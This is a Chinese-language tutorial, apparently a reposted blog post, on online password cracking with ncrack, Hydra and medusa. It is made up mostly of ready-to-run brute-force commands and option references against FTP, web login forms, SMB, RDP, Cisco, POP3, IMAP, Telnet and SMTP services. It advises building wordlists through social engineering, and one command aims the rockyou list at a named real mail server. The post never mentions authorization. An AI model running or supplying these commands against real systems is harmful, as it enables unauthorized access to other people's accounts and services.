在线密码破解

在线密码破解

——ncrack、Hydra、medusa、Brutus

AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.

 

直接上手操作,在我们不知道用户名以及密码的情况下爆破:

我们需要用字典生成工具生成一个字典,放在桌面上备用。

        命令:ncrack  U  /root/桌面/pass.txt  P  /root/桌面/pass.txt  ftp://000.000.000.000

       解释:-U为用户名,后面的/root/桌面/pass.txt 为爆破字典所在位置,同样-P为密码,后面的/root/桌面/pass.txt 也为爆破字典所在位置。只要你的字典足够强大,那么就是时间问题了。在组成字典的时候,要综合运用社工等方法形成一套适合的字典。ftp后面的000.000.000.000ftp的地址,根据自己实际情况来改动。

在我们,知道用户名的情况下爆破:

       ncrack  --user  用户名  -P  /root/桌面/pass.txt  ftp://000.000.000.000

        解释同上,但要注意--user是两道杠,并且user是小写,kali linux大小写敏感。

Hydra再来进行一遍一样的实验:

在不知用户名以及密码的情况下,采用自己生成的密码爆破:

        命令:hydra  ftp://000.000.000.000  -L  /root/桌面/pass.txt  -P  /root/桌面/pass.txt

在已知用户名的情况下爆破:

       命令:hydra  ftp://000.000.000.000  -l  用户名  -P  /root/桌面/pass.txt

注意大小写,小写的l,大写的P

      最后,来介绍一下medusa的操作方法

操作命令:

medusa

               -h target ftp的地址)

 

               -H many targets

 

               -u 已知用户名

 

               -U 用户名的字典文件

 

               -p 已知密码

 

               -P 密码的字典

 

               -M 模式 ftp http telnet ssh

 

实战命令:

 

已知用户名爆破密码:

 

medusa  -h  000.000.000.000 -u 用户名P  /root/桌面/pass.txt  -M ftp

 

未知用户名爆破密码:

 

medusa -h  000.000.000.000  -U  /root/桌面/pass.txt P  /root/桌面/pass.txt  -M ftp

 

 

hydra

 

-R
继续从上一次进度接着破解

-S
大写,采用SSL链接

-s <PORT>
小写,可通过这个参数指定非默认端口

-l <LOGIN>
指定破解的用户,对特定用户破解

-L <FILE>
指定用户名字典

-p <PASS>
小写,指定密码破解,少用,一般是采用密码字典

-P <FILE>
大写,指定密码字典

-e <ns>
可选选项,n:空密码试探,s:使用指定用户和密码试探

-C <FILE>
使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

-M <FILE>
指定目标列表文件一行一条

-o <FILE>
指定结果输出文件

-f
在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

-t <TASKS>
同时运行的线程数,默认为16

-w <TIME>
设置最大超时的时间,单位秒,默认是30s

-v / -V
显示详细过程

server
目标ip

service
指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等

破解ftp:

# hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) –vV

 # hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

get方式提交,破解web登录:

# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/   

# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登录:

  该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:

<form action="index.php" method="POST">< input type="text" name="name" /><BR><br>< input type="password" name="pwd" /><br><br>< input type="submit" name="sub" value="提交">< /form>

  假设有以上一个密码登录表单,我们执行命令:

# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

  说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

  后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

破解https:

# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

破解teamspeak:

# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco:

# hydra -P pass.txt 10.36.16.18 cisco

 # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb:

# hydra -l administrator -P pass.txt 10.36.16.18 smb

破解pop3:

# hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp:

# hydra ip rdp -l administrator -P pass.txt -V

破解http-proxy:

# hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解imap:

# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

破解telnet

# hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

hydra -l admin -P /usr/share/dirb/wordlists/small.txt 192.168.1.101 http-post-form“/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:登录失败“-V

hydra -S -l 邮箱 -P /usr/share/wordlists/rockyou.txt -e ns -V -s 465 -t 1 smtp.ym.163.com smtp

猜你喜欢

转载自www.cnblogs.com/whoamwho/p/13197661.html